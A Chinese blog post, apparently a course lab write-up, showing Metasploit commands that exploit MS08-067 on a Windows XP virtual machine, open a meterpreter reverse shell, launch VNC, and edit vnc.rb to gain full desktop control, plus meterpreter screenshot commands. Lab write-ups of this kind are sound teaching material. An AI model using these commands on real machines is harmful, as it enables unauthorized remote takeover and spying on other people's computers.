当前位置:   article > 正文

Metasploit利用vnc图形化远程控制工具获得靶机远程控制桌面_metaspoit vnc

metaspoit vnc
问题描述

  分别在Windows和Linux操作系统上安装Metasploit软件,并运行Metasploit完成针对Linux靶机usermap_script漏洞的渗透攻击,尝试使用植入VNC图形化远程控制工具的攻击载荷,成功获得Linux靶机上的远程控制桌面。
  由于笔者没有配置Linux虚拟机,因此使用Windows XP SP3中文版作为靶机,并使用ms08_067作为渗透模块进行渗透。

解决办法

在msfconsole中使用命令:

use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/meterpreter/reverse_tcp
set RHOST 192.168.161.130
set LHOST 192.168.161.128
set TARGET 34
exploit
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6

得到会话后使用命令run vnc获得靶机桌面。结果如下:
在这里插入图片描述
在这里插入图片描述

如何控制

  由于使用已经封装好的vnc只能进行靶机桌面的监控,并不能完成对靶机桌面的控制,因此想要完成对靶机的控制,需要对vnc.rb文件进行修改。
  在目录/usr/share/metasploit-framework/scripts/meterpreter/下找到vnc.rb文件,如下:

在该文件中找到pay的声明位置,在其后添加pay.datastore['ViewOnly'] = false后即可对远程桌面进行控制。

一些关于远程桌面的命令

enumdesktops   #查看可用的桌面
getdesktop   #获取当前 meterpreter 关联的桌面
set_desktop   #设置 meterpreter 关联的桌面 h 查看帮助
screenshot   #截屏
use espia   #或者使用 espia 模块截屏 然后输入 screengrab
run vnc   #使用使用vnc远程桌面连接

参考资料

Meterpreter run vnc 遇到的问题
metasploit 目录结构

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/weixin_40725706/article/detail/579296
推荐阅读
相关标签
  

闽ICP备14008679号